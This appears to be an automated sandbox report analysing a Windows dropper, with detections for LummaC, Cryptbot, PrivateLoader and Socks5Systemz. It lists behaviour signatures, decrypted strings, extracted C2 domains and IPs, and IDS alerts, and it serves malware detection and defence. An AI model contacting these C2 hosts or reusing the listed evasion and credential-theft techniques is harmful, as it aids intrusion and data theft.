Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1521590
MD5: 731200ce89a30b22a5530838e57862f3
SHA1: 0c86827c47e040d82869846c68bedb9d8afbcde0
SHA256: b39525df56e9d5f26067add74133154b651ca91d4201302ce505444d00ac6693
Tags: NETexeMSILuser-jstrosch
Infos:

Detection

LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5Systemz
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
Yara detected LummaC Stealer
Yara detected Neoreklami
Yara detected PrivateLoader
Yara detected Socks5Systemz
.NET source code contains very large array initializations
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates HTML files with .exe extension (expired dropper behavior)
Drops PE files to the document folder of the user
Drops large PE files
Found API chain indicative of sandbox detection
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Modifies Windows Defender protection settings
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Lumma Stealer, LummaC2 Stealer Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot
Name Description Attribution Blogpost URLs Link
PrivateLoader According to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader

AV Detection
barindex
Found malware configuration
Source: 50.2.BitLockerToGo.exe.260000.0.unpack Malware Configuration Extractor: LummaC {"C2 url": ["drawzhotdog.shop", "gutterydhowi.shop", "ghostreedmnu.shop", "reinforcenh.shop", "fragnantbui.shop", "stogeneratmns.shop", "vozmeatillu.shop", "offensivedzvju.shop"], "Build id": "9mkWlh--RaUFPPPp"}
Source: playglock32x64.exe.8056.13.memstrmin Malware Configuration Extractor: Socks5Systemz {"C2 list": ["ejrsoyz.ua8a"]}
Source: G__XJZ9ACVwRjgVn6BXId6E1.exe.7876.6.memstrmin Malware Configuration Extractor: Cryptbot {"C2 list": ["01fivevh5pt.top", "analforeverlovyu.top", "fivevh5pt.top", "+fivevh5pt.top"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\soft[1] ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Channel2[1].exe ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\CheckTool[1].exe ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\1u2wN0W4Z43Z310SAYDV85NF4w4\Y-Cleaner.exe ReversingLabs: Detection: 70%
Source: C:\Users\user\AppData\Local\Temp\7zS2897.tmp\Install.exe ReversingLabs: Detection: 50%
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe ReversingLabs: Detection: 23%
Source: C:\Users\user\Documents\iofolko5\Ifh3vuF2SF2LvHombSP7ZGRi.exe ReversingLabs: Detection: 26%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 57%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\ProgramData\Edrax Smart Maker 9.28.47\Edrax Smart Maker 9.28.47.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: reinforcenh.shop
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: stogeneratmns.shop
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: fragnantbui.shop
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: drawzhotdog.shop
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: vozmeatillu.shop
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: offensivedzvju.shop
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: ghostreedmnu.shop
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: gutterydhowi.shop
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: ghostreedmnu.shop
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 0000000A.00000002.1763568801.00000000018DC000.00000004.00001000.00020000.00000000.sdmp String decryptor: 9mkWlh--RaUFPPPp
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0051CCF0 GetModuleHandleA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError, 3_2_0051CCF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0051CF90 SetLastError,GetModuleHandleA,CryptGenRandom, 3_2_0051CF90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0051CEB0 CryptReleaseContext, 3_2_0051CEB0
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_004034B0 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy, 9_2_004034B0
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020C3717 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy, 9_2_020C3717
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0045D4EC GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion, 11_2_0045D4EC
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0045D5A0 ArcFourCrypt, 11_2_0045D5A0
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_0045D5B8 ArcFourCrypt, 11_2_0045D5B8
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_10001000 ISCryptGetVersion, 11_2_10001000
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_10001130 ArcFourCrypt, 11_2_10001130

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Unpacked PE file: 9.2.tyq3dazbB0crObgKIDGLxiAO.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Play Glock\playglock32x64.exe Unpacked PE file: 13.2.playglock32x64.exe.400000.0.unpack
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Play Glock_is1 Jump to behavior
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 173.231.16.77:443 -> 192.168.2.9:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.9:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49722 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49725 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49726 version: TLS 1.2
Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: msvcp71.pdbx# source: is-IKU3H.tmp.11.dr
Source: Binary string: c:\rje\tg\e\obj\Release\ojc.pdb source: file.exe
Source: Binary string: BitLockerToGo.pdb source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1763568801.0000000001908000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msvcp71.pdb source: is-IKU3H.tmp.11.dr
Source: Binary string: c:\rje\tg\e\obj\Release\ojc.pdb4 source: file.exe
Source: Binary string: BitLockerToGo.pdbGCTL source: Ifh3vuF2SF2LvHombSP7ZGRi.exe, 0000000A.00000002.1763568801.0000000001908000.00000004.00001000.00020000.00000000.sdmp

Spreading
barindex
Yara detected Neoreklami
Source: Yara match File source: Process Memory Space: Install.exe PID: 8132, type: MEMORYSTR
Yara detected PrivateLoader
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7600, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00540A25 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 3_2_00540A25
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_0040553A FindFirstFileA, 8_2_0040553A
Source: C:\Users\user\Documents\iofolko5\Jrh6BLxH1aqS3cJle2sY_F2Q.exe Code function: 8_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA, 8_2_004055DE
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_0041E01D FindFirstFileExW, 9_2_0041E01D
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_10007EA9 FindFirstFileExW, 9_2_10007EA9
Source: C:\Users\user\Documents\iofolko5\tyq3dazbB0crObgKIDGLxiAO.exe Code function: 9_2_020DE284 FindFirstFileExW, 9_2_020DE284
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00452A4C FindFirstFileA,GetLastError, 11_2_00452A4C
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004751F8 FindFirstFileA,FindNextFileA,FindClose, 11_2_004751F8
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00464048 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 11_2_00464048
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_004644C4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, 11_2_004644C4
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00462ABC FindFirstFileA,FindNextFileA,FindClose, 11_2_00462ABC
Source: C:\Users\user\AppData\Local\Temp\is-QKCAE.tmp\hI6pMK6rYY2urO_lpGyU85DA.tmp Code function: 11_2_00497A74 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, 11_2_00497A74
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\Documents\iofolko5\G__XJZ9ACVwRjgVn6BXId6E1.exe File opened: C:\Users\user Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.9:49720 -> 84.38.182.221:80
Source: Network traffic Suricata IDS: 2056162 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop) : 192.168.2.9:53223 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056163 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) : 192.168.2.9:49725 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.9:49724 -> 84.38.182.221:80
Source: Network traffic Suricata IDS: 2056163 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI) : 192.168.2.9:49726 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.9:49727 -> 84.38.182.221:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49749 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49761 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49766 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49768 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49776 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49781 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49778 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49780 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49771 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49783 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49786 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49785 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49784 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49787 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49769 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49790 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49788 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49789 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49777 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49791 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49798 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49796 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49764 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49774 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49800 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49805 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49804 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49799 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49808 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49809 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49812 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49814 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49811 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49772 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49810 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49793 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49794 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49813 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49770 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49802 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49792 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49775 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49797 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49795 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49773 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49806 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49807 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49779 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49801 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49803 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.9:49782 -> 185.208.158.248:80
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49725 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49725 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.9:49726 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49726 -> 188.114.96.3:443
Yara detected PrivateLoader
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7600, type: MEMORYSTR
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: drawzhotdog.shop
Source: Malware configuration extractor URLs: gutterydhowi.shop
Source: Malware configuration extractor URLs: ghostreedmnu.shop
Source: Malware configuration extractor URLs: reinforcenh.shop
Source: Malware configuration extractor URLs: fragnantbui.shop
Source: Malware configuration extractor URLs: stogeneratmns.shop
Source: Malware configuration extractor URLs: vozmeatillu.shop
Source: Malware configuration extractor URLs: offensivedzvju.shop
Source: Malware configuration extractor URLs: ejrsoyz.ua8a
Source: Malware configuration extractor URLs: 01fivevh5pt.top
Source: Malware configuration extractor URLs: analforeverlovyu.top
Source: Malware configuration extractor URLs: fivevh5pt.top
Source: Malware configuration extractor URLs: +fivevh5pt.top
Creates HTML files with .exe extension (expired dropper behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: VUi4VlAeU5mHTySwb10PMAu9.exe.3.dr
